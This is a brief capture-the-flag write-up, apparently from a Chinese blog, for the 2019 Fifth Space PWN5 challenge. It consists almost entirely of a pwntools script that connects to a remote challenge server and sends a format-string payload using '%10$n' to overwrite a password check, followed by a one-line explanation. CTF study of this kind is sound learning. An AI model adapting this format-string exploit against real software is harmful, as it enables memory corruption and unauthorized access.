[第五空间2019 决赛]PWN5
from pwn import *
io = remote('node5.buuoj.cn',29141)
context.log_level = 'debug'
io.recvuntil("your name:")
payload=p32(0x0804c044)+b'%10$n'
io.sendline(payload)
io.recvuntil(b"your passwd:")
io.sendline(b'4')
io.interactive()
利用%10$n向的地址写入4(因为0x0804c044占四个字节)
Comments NOTHING